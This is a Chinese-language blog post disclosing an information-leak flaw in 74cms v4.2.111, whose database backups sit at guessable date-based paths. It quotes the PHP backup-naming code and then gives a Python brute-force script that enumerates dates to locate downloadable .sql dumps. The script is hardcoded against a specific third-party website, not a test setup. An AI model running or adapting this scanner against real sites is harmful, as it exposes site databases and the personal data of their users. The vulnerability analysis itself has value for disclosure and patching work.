74cms_v4.2.111备份漏洞
首页 > 漏洞    作者:Iamyc   2019年1月26日 14:10 星期六   热度:912°   百度已收录  
时间:2019-1-26 14:10   热度:912° 

今天随便拿了套开源的骑士cms,版本4.2.111

这套源码是基于Thinkphp再开发的,不过还是瞅瞅先,看能不能挖出什么来

。。。

中间的过程跳过,直接讲这个漏洞

先看文件Application\Admin\Controller\DatabaseController.class.php这段代码


    /**
     * 生成备份文件夹名称
     */
    protected function _make_backup_name(){
        $backup_path = DATABASE_BACKUP_PATH;
        $today = date('Ymd_', time());
        $today_backup = array(); //保存今天已经备份过的
        if (is_dir($backup_path))
        {
            if ($handle = opendir($backup_path))
            {
                while (($file = readdir($handle)) !== false)
                {
                    if ($file{0} != '.' && filetype($backup_path . $file) == 'dir')
                    {
                        if (strpos($file, $today) === 0)
                        {
                            $no = intval(str_replace($today, '', $file)); //当天的编号
                            if ($no)
                            {
                                $today_backup[] = $no;
                            }
                        }
                    }
                }
            }
        }
        if ($today_backup)
        {
            $today .= max($today_backup) + 1;
        } else
        {
            $today .= '1';
        }
        return $today;
    }

生成文件定义$today = date('Ymd_', time());=====>形如:20190126_   文件名


        if ($today_backup)
        {
            $today .= max($today_backup) + 1;
        } else
        {
            $today .= '1';
        }
        return $today;
再拼凑最小为1,如果存在,取最大加1,那么可以认为1必定存在,直接从1开始暴
得到文件夹名   20190126_1


   /**
     * 保存导出的sql
     */
    protected function _sava_sql($vol){
        return file_put_contents(DATABASE_BACKUP_PATH . $this->backup_name .
            '/' . $this->backup_name . '_' . $vol . '.sql', $this->dump_sql);
    }
拼凑出  20190126_1/20190126_1_1.sql
综合为  data\backup\database\20190126_1\20190126_1_1.sql
得出后直接继续暴20190126_2\20190126_2_1.sql类推就ok


得到思路,接下来就是很简单的暴力了,写个exp如下:


import requests

year = ['2015','2016','2017','2018','2019']
month = ['01','02','03','04','05','06','07','08','09','10','11','12']
day = ['01','02','03','04','05','06','07','08','09','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31']
url = "http://www.xunpao123.com/51jishiwang/data/backup/"
tezheng = "Copyright © 2016 74cms.com"
headers = {"User-Agent"," Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"}

def main():
    url = "http://www.xunpao123.com/51jishiwang/data/backup/database/"
    for ye in year:
        for mo in month:
            for da in day:
                tim = ye+mo+da
                url_0 = url+tim+"_1/"
                
                
                html = requests.get(url_0)
                if html.status_code==200 and html.text.find("404")<0:
                    print url_0+tim+"_1_1.sql"
                else:
                    pass
                
              
                
                
                

if __name__ == '__main__':
	
    main()
效果如下





二维码加载中...
本文作者:Iamyc      文章标题: 74cms_v4.2.111备份漏洞
本文地址:http://lang-v.com/first_cms/yc/emlog/src/?post=60
版权声明:若无注明,本文皆为“YC's Blog”原创,转载请保留文章出处。

返回顶部    首页    手机版本    后花园  
版权所有:YC's Blog    站长: Iamyc    程序:emlog